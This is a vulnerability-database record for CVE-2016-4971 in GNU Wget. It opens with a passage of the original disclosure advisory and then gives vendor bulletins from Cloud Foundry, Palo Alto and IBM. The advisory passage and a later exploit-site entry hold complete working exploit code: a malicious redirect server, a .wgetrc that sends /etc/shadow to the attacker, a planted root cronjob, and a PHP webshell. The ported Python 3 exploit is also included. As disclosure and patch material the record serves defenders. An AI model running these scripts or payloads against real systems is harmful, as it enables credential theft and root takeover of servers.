\nLength: 55 (unauthoritative) \n \n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s \n \n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55] \n \n \nvictim@trusty:~$ ls -l \ntotal 4 \n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile \nvictim@trusty:~$ \n \n \nThis vulnerability will not work if extra options that force destination \nfilename are specified as a parameter. Such as: -O /tmp/output \nIt is however possible to exploit the issue with mirroring/recursive options \nenabled such as -r or -m. \n \nAnother limitation is that attacker exploiting this vulnerability can only \nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option). 
\nThis could however be enough to exploit wget run from home directory, or \nwithin web document root (in which case attacker could write malicious php files \nor .bash_profile files). \n \nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory. \n \nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget \nsettings such as destination directory for all downloaded files in future, \nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses. \n \n \nHere is a set of Wget settings that can be helpful to an attacker: \n \ndir_prefix = string \nTop of directory tree\u2014the same as \u2018-P string\u2019. \n \npost_file = file \nUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u2018--post-file=file\u2019. \n \nrecursive = on/off \nRecursive on/off\u2014the same as \u2018-r\u2019. \n \ntimestamping = on/off \nAllows overwriting of existing files. \n \ncut_dirs = n \nIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). \n \nhttp_proxy \nHTTP Proxy server \n \nhttps_proxy \nHTTPS Proxy server \n \noutput_document = file \nSet the output filename\u2014the same as \u2018-O file\u2019. \n \ninput = file \nRead the URLs from string, like \u2018-i file\u2019. \n \nmetalink-over-http \nIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \nThen it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. 
\n \n \n \nFull list of .wgetrc options can be found in: \n \nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands \n \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n1) Cronjob with wget scenario \n \nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner. \nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. \nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs: \n \nhttps://codex.wordpress.org/Post_to_your_blog_using_email \nhttps://docs.moodle.org/2x/ca/Cron \nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site \nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel \n \nSuch setup could be abused by attackers to upload .bash_profile file through \nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n \nAs cron runs priodically attackers, could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution. \n \n \nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests. \n \nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. 
\nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n \nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root. \n \n \nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget. \n \nThe root cronjob on the victim server may look as follows: \n \nroot@victim:~# cat /etc/cron.d/update-database \n# Update database file every 2 minutes \n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 \n \n \nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server: \n \nattackers-server# mkdir /tmp/ftptest \nattackers-server# cd /tmp/ftptest \n \nattackers-server# cat <<_EOF_>.wgetrc \npost_file = /etc/shadow \noutput_document = /etc/cron.d/wget-root-shell \n_EOF_ \n \nattackers-server# sudo pip install pyftpdlib \nattackers-server# python -m pyftpdlib -p21 -w \n \n \nAt this point attacker can start an HTTP server which will exploit wget by \nsending malicious redirects to the victim wget's requests: \n \n---[ wget-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget 1.18 < Arbitrary File Upload Exploit \n# Dawid Golunski \n# dawid( at )legalhackers.com \n# \n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n# \n# CVE-2016-4971 \n# \n \nimport SimpleHTTPServer \nimport SocketServer \nimport socket; \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_GET(self): \n# This takes care of sending .wgetrc \n \nprint \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" 
\nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nprint \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\" \nself.send_response(301) \nnew_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) \nprint \"Sending redirect to %s \\n\"%(new_path) \nself.send_header('Location', new_path) \nself.end_headers() \n \ndef do_POST(self): \n# In here we will receive extracted file and install a PoC cronjob \n \nprint \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \ncontent_len = int(self.headers.getheader('content-length', 0)) \npost_body = self.rfile.read(content_len) \nprint \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body) \n \nprint \"Sending back a cronjob script as a thank-you for the file...\" \nprint \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\" \nself.send_response(200) \nself.send_header('Content-type', 'text/plain') \nself.end_headers() \nself.wfile.write(ROOT_CRON) \n \nprint \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\" \n \nreturn \n \nHTTP_LISTEN_IP = '192.168.57.1' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.57.1' \nFTP_PORT = 21 \n \nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\" \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"Ready? Is your FTP server running?\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint \"FTP found open on %s:%s. 
Let's go then\\n\" % (FTP_HOST, FTP_PORT) \nelse: \nprint \"FTP is down :( Exiting.\" \nexit(1) \n \nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n---[ eof ]--- \n \n \n \nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes \nthe aforementioned cronjob with wget. \n \nThe output should look similar to: \n \n \n---[ wget-exploit.py output ]--- \n \nattackers-server# python ./wget-exploit.py \n \nReady? Is your FTP server running? \nFTP found open on 192.168.57.1:21. Let's go then \n \nServing wget exploit on port 80... \n \n \nWe have a volunteer requesting /database.db by GET :) \n \nUploading .wgetrc via ftp redirect vuln. It should land in /root \n \n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 - \nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n \nWe have a volunteer requesting /database.db by POST :) \n \nReceived POST from wget, this should be the extracted /etc/shadow file: \n \n---[begin]--- \nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: \ndaemon:*:16484:0:99999:7::: \nbin:*:16484:0:99999:7::: \nsys:*:16484:0:99999:7::: \nsync:*:16484:0:99999:7::: \ngames:*:16484:0:99999:7::: \nman:*:16484:0:99999:7::: \nlp:*:16484:0:99999:7::: \n...cut... \n---[eof]--- \n \nSending back a cronjob script as a thank-you for the file... \nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) \n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 - \n \nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n \n---[ output eof ]--- \n \n \nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file \nsetting to /etc/shadow. \nTherefore, on the next wget run, wget sent back shadow file to the attacker. 
\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver: \n \n \nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n \nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root) \n \n \n \n2) PHP web application scenario \n \nIf wget is used within a PHP script e.g.: \n \n<?php \n \n// Update geoip data \n \nsystem(\"wget -N -P geoip http://attackers-host/goeip.db\"); \n \n?> \n \nAn attacker who manages to respond to the request could simply upload a PHP \nbackdoor of: \n \n<?php \n//webshell.php \n \nsystem($_GET['cmd']); \n?> \n \nby using the wget-exploit script described in example 1. \n \nAfter the upload they could simply execute the script and their shell \ncommand by a GET request to: \n \nhttp://victims-php-host/geoip/webshell.php?cmd=id \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or \neven path (if wget is run from a home directory). \nDepending on the context in which wget is used, this could lead to \nuploading a web shell and granting the attacker remote access to the \nsystem, or privilege escalation. It could be possible for attackers to escalate \nto root user if wget is run via root cronjob as is often the case in web \napplication deployments and is recommended in some guides on the Internet. \n \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nAll versions of Wget before the patched version of 1.18 are affected. \n \nVIII. 
SOLUTION \n------------------------- \n \nUpdate to wget version 1.18 as advertised by the vendor at: \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nLinux distributions should update their wget packages. It is recommended \nto update wget manually if an updated package is not available for your \ndistribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nhttp://www.ubuntu.com/usn/usn-3012-1/ \n \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n06.07.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137795/wget-fileuploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:03", "description": "USN-3012-1 Wget vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, wget\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nDawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. 
\n_\n\n * Cloud Foundry cflinuxfs2 versions prior to 1.67.0 \n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.17 AND other versions prior to 3232.12 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * Upgrade to Cloud Foundry cflinuxfs2 versions 1.67.0 or later \n * The Cloud Foundry team has released patched BOSH stemcells 3146.17 and 3232.12 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.17 OR other versions to 3232.12 \n\n# Credit\n\nDawid Golunski\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-3012-1/>\n * <http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-4971>\n * <https://bosh.io/stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T00:00:00", "type": "cloudfoundry", "title": "USN-3012-1 Wget vulnerability | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T00:00:00", "id": "CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", 
"href": "https://www.cloudfoundry.org/blog/usn-3012-1/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "paloalto": [{"lastseen": "2021-07-28T14:33:16", "description": "The wget library has been found to contain a vulnerability (CVE 2016-4971). wget allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-59677/ CVE 2016-4971)\nSuccessfully exploiting this issue would require an attacker to be authenticated on the Management Interface.\nThis issue affects PAN-OS 6.1.16 and earlier, PAN-OS 7.0.14 and earlier, PAN-OS 7.1.9 and earlier, PAN-OS 8.0\n\n**Work around:**\nPalo Alto Networks recommends to implement best practice by allowing web interface access only to a dedicated management network. Additionally, restrict the set of IP addresses to a subset of authorized sources that you allow to interact with the management network.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-05-23T03:00:03", "type": "paloalto", "title": "WGET Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2017-05-23T03:00:03", "id": "PAN-SA-2017-0016", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ibm": [{"lastseen": "2022-06-28T21:58:48", "description": "## Summary\n\nPowerKVM is affected by a vulnerability in wget. IBM has now addressed this vulnerability.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4971_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>)** \nDESCRIPTION:** GNU wget could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted HTTP redirect message with an FTP server Location value to download and write or overwrite arbitrary files on the system. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114406_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114406>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n## Affected Products and Versions\n\nPowerKVM 2.1 and PowerKVM 3.1\n\n## Remediation/Fixes\n\nCustomers can update PowerKVM systems by using \"yum update\". \n\nFix images are made available via Fix Central. For version 3.1, see [_https://ibm.biz/BdHggw_](<https://ibm.biz/BdHggw>). This issue is addressed as of 3.1.0.2 update 3 or later.\n\nFor version 2.1, see [_https://ibm.biz/BdEnT8_](<https://ibm.biz/BdEnT8>). This issue is addressed as of PowerKVM 2.1.1.3-65 update 13 or later. Customers running v2.1 are, in any case, encouraged to upgrade to v3.1. 
\n\nFor v2.1 systems currently running fix levels of PowerKVM prior to 2.1.1, please see <http://download4.boulder.ibm.com/sar/CMA/OSA/05e4c/0/README> for prerequisite fixes and instructions.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n11 November 2016 - Initial Version\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. 
In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSZJY4\",\"label\":\"PowerKVM\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;3.1\",\"Edition\":\"KVM\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-18T01:34:17", "type": "ibm", "title": 
"Security Bulletin: A vulnerability in wget affects PowerKVM", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2018-06-18T01:34:17", "id": "C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B", "href": "https://www.ibm.com/support/pages/node/630103", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-13T01:30:13", "description": "## Summary\n\nA vulnerability with GNU wget affects IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data (CVE-2016-4971). Please see below for details on how to remediate this issue.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2016-4971](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>) \n** DESCRIPTION: **GNU wget could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted HTTP redirect message with an FTP server Location value to download and write or overwrite arbitrary files on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114406](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114406>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.7 \n \n\n\n## Remediation/Fixes\n\nPlease upgrade to IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data, version 4.0.8. This version can be obtained here: \n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=overview-whats-new>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n25 Apr 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSH3YV\",\"label\":\"IBM Speech to Text for IBM Cloud\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"4.0.0 - 4.0.7\",\"Edition\":\"All\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: A vulnerability with GNU wget affects\u00a0IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data (CVE-2016-4971)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": 
"2023-01-12T21:59:00", "id": "3212B53427A43325550BE8D76D8414CB80F59E8C098469790D9938A354FC4F5A", "href": "https://www.ibm.com/support/pages/node/6575485", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-21T23:23:38", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36167", "href": "https://0day.today/exploit/description/36167", "sourceData": "# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)\n# Original Exploit Author: Dawid Golunski\n# Exploit Author: liewehacksie\n# Version: GNU Wget < 1.18 \n# CVE: CVE-2016-4971\n\nimport http.server\nimport socketserver\nimport socket\nimport sys\n\nclass wgetExploit(http.server.SimpleHTTPRequestHandler):\n\n def do_GET(self):\n # This takes care of sending .wgetrc/.bash_profile/$file\n\n print(\"We have a volunteer requesting \" + self.path + \" by 
GET :)\\n\")\n if \"Wget\" not in self.headers.get('User-Agent'):\n print(\"But it's not a Wget :( \\n\")\n self.send_response(200)\n self.end_headers()\n self.wfile.write(\"Nothing to see here...\")\n return\n\n self.send_response(301)\n print(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. It should land in /home/ \\n\")\n new_path = 'ftp://[email\u00a0protected]{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)\n\n print(\"Sending redirect to %s \\n\"%(new_path))\n self.send_header('Location', new_path)\n self.end_headers()\n\n\nHTTP_LISTEN_IP = '192.168.72.2'\nHTTP_LISTEN_PORT = 80\nFTP_HOST = '192.168.72.4'\nFTP_PORT = 2121\nFILE = '.bash_profile'\n\nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\n\nprint(\"Ready? Is your FTP server running?\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\nif result == 0:\n print(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT))\nelse:\n print(\"FTP is down :( Exiting.\")\n exit(1)\n\nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT)\n\nhandler.serve_forever()\n", "sourceHref": 